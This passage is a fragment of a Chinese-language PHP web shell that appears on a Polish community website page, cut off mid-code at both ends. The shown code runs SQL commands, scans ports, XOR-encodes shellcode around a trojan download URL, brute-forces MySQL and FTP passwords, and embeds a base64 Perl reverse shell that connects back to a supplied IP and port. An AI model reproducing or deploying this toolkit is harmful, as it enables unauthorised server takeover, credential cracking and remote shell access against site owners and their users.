COLUMN PASS"; if(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} return true; } 数据库连接字符串

SQL命令

END; if(!empty($string)) { @$shell->Open($string); $result = @$shell->Execute($sql); $count = $result->Fields->Count(); for($i=0;$i < $count;$i++){$Field[$i] = $result->Fields($i);} echo $result ? $sql.' 执行成功
' : $sql.' 执行失败
'; if(!empty($count)){while(!$result->EOF){for($i=0;$i < $count;$i++){echo $Field[$i]->value.'
';}@$result->MoveNext();}} $shell->Close(); } } @$shell->Release(); $shell = NULL; echo '

'; return true; } //端口扫描 function Port_i() { print<<
END; if((!empty($_POST['ip'])) && (!empty($_POST['port']))) { $ports = explode('|',$_POST['port']); for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,1); echo $fp ? '开放端口 ---> '.$ports[$i].'
' : '关闭端口 ---> '.$ports[$i].'
'; ob_flush(); flush(); } } echo ''; return true; } //网马转换 function shellcode_decode($Url_String,$Oday_value) { $Oday_value = hexdec($Oday_value); $$Url_String = str_replace(" ", "", $Url_String); $SHELL = explode("%u", $Url_String); for($i=0;$i < count($SHELL);$i++) { $Temp = $SHELL[$i]; $s_1 = substr($Temp,2); $s_2 = substr($Temp,0,2); $COPY .= $s_1.$s_2; } for($n=0; $n < strlen($COPY); $n+=2){$Decode .= pack("C", hexdec(substr($COPY, $n, 2) )^ $Oday_value);} return $Decode; } function shellcode_encode($Url_String,$Oday_value) { $Length =strlen($Url_String); $Todec = hexdec($Oday_value); for ($i=0; $i < $Length; $i++) { $Temp = ord($Url_String[$i]); $Hex_Temp = dechex($Temp ^ $Todec); if (hexdec($Hex_Temp) < 16) $Hex_Temp = '0'.$Hex_Temp; $hex .= $Hex_Temp; } if ($Length%2) $hex .= $Oday_value.$Oday_value; else $hex .= $Oday_value.$Oday_value.$Oday_value.$Oday_value; for ($n=0; $n < strlen($hex); $n+=4) { $Temp = substr($hex, $n, 4); $s_1= substr($Temp,2); $s_2= substr($Temp,0,2); $Encode.= '%u'.$s_1.$s_2; } return $Encode; } function shellcode_findxor($Url_String) { for ($i = 0; $i < 256; $i++) { $shellcode[0] = shellcode_decode($Url_String, dechex($i)); if ((strpos ($shellcode[0],'tp:')) || (strpos ($shellcode[0],'url')) || (strpos ($shellcode[0],'exe'))) { $shellcode[1] = dechex($i); return $shellcode; } } } function Shellcode_j() { $Oday_value = '0'; $Shell_Code = 'http://www.baidu.com/download/muma.exe'; $checkeda = ' checked'; $checkedb = ''; if(!empty($_POST['code'])) { if($_POST['xor'] == 'a' && isset($_POST['number'])){$Oday_value = $_POST['number'];$Shell_Code = shellcode_encode($_POST['code'],$Oday_value);} if($_POST['xor'] == 'b'){$checkeda = '';$checkedb = ' checked';$Shell_Code_Array = shellcode_findxor($_POST['code']);$Shell_Code = $Shell_Code_Array[0];$Oday_value = $Shell_Code_Array[1];} if(!$Oday_value) $Oday_value = '0'; if(!$Shell_Code) $Shell_Code = '未找到shellcode中的下载地址'; $Shell_Code = htmlspecialchars($Shell_Code); } print<<

异或值 shellcode异或加密 shellcode异或解密

END; return true; } //扫弱口令 function Crack_k() { $MSG_BOX = '等待消息队列'; $ROOT_DIR = File_Mode(); $SORTS = explode('/',$ROOT_DIR); array_shift($SORTS); $PASS = join(',',$SORTS); for($i = 0;$i < 10;$i++){$n = (string)$i; $PASS .= $n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.$n.',';} if((!empty($_POST['address'])) && (!empty($_POST['user'])) && (!empty($_POST['pass']))) { $SORTPASS = explode(',',$_POST['pass']); $connect = false; $MSG_BOX = '未找到匹配密码'; for($k = 0;$k < count($SORTPASS);$k++) { if($_POST['class'] == 'mysql') $connect = @mysql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k])); if($_POST['class'] == 'ftp'){$Ftp_conn = @ftp_connect($_POST['address'],'21');$connect = @ftp_login($Ftp_conn,$_POST['user'],chop($SORTPASS[$k]));} if($connect) $MSG_BOX = '[项目: '.$_POST['class'].'] [地址: '.$_POST['address'].'] [用户: '.$_POST['user'].'] [密码: '.$SORTPASS[$k].']'; } } print<<

{$MSG_BOX}

地址

帐号

密码

破解项目: Mysql FTP

END; return true; } //Linux提权 function Linux_l() { $yourip = getenv('REMOTE_ADDR'); print<<
END; if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) { if($_POST['use'] == 'perl') { $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGR

Nowy Szczecin | Śródodrze | Konsorcjum | Forum | Kontakt

xContent © Copyright 2003-2007 Konsorcjum na Rzecz Śródodrza.
Projekt i wykonanie: Dige Polska.